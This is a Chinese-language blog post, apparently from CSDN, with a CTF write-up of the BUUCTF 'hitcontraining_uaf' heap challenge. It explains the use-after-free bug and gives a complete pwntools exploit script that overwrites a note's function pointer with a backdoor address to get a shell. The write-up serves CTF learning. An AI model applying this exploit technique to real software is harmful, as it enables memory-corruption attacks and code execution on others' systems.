hitcontraining_uaf

最新推荐文章于 2023-04-12 09:12:15 发布
最新推荐文章于 2023-04-12 09:12:15 发布
阅读量232 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121574772
版权

hitcontraining_uaf

使用checksec查看:
在这里插入图片描述
看题目名,应该是用UAF去解题

拉进IDA中看下add函数:
在这里插入图片描述
可以发现,add一个note会malloc两个堆,第一个堆不可控,大小默认为0x8,储存函数。第二个堆是用户可控的context。

本来是想看Edit函数的,结果发现这个程序并没有这个函数,给的是print:
在这里插入图片描述
print调用的是add_note中第一个chunk指针指向的内容,也就是print_note_content进行输出操作。

那就只能从print_note_content下手了。

在程序中查找一下字符串,可以发现/bin/sh,跟进查看函数:
在这里插入图片描述
拿到函数的地址:0x8048945

接下来思路就很明了了

  • 申请两个chunk
  • free掉这两个chunk
  • 再申请一个chunk,大小为0x8,这样就能将刚刚申请两个chunk时系统自动申请的两个chunk拿来用了,context处写入getshell的地址:0x8048945
  • 调用print_not就变成了getshell

exp:

from pwn import*

# r = remote('node4.buuoj.cn',25488)
r = process('../buu/hitcontraining_uaf')

def add(size,content):
  r.sendlineafter('choice :','1')
  r.sendlineafter('Note size :',str(size))
  r.sendlineafter('Content :',content)

def delete(idx):
  r.sendlineafter('choice :','2')
  r.sendlineafter('Index :',str(idx))

def printf(idx):
  r.sendlineafter('choice :','3')
  r.sendlineafter('Index :',str(idx))

shell_addr = 0x8048945

add(0x10,'M')
add(0x10,'M')
delete(0)
delete(1)
add(0x8,p32(shell_addr))
printf(0)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 926
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
2021_UAF_SE_Nhom06
03-20
【标题】"2021_UAF_SE_Nhom06" 指的可能是一个软件工程项目的代码库,其中“UAF”可能是大学或机构的缩写,“SE”代表“Software Engineering”(软件工程),而“Nhom06”可能是项目组的编号或者课程的学期编号。...
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 323
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS 没有自动化测试非最终产品(仅用于通过FIDO认证测试套件)-不进行代码审查-不进行渗透测试运行测试建于贡献请阅读以获取有关我们的行为准则...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
FIDO-UAF协议
12-30
FIDO-UAF协议官方文档,FIDO协议是目前国际范围内最火的统一认证协议
buu|hitcontraining_uaf 1
m0_64236521的博客
07-09 156
hitcontraining_uaf 1 这里一次会申请两个堆,其中第一个堆放着print_note_content 前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中 在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可 申请两个堆块儿 释放掉 0x10里有两个堆,都是之前存...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 311
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1650
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
buuctf hitcontraining_uaf
最新发布
cainiao78777的博客
04-12 236
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
hitcontrainingUAF之我见
TedLau的博客
06-16 272
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值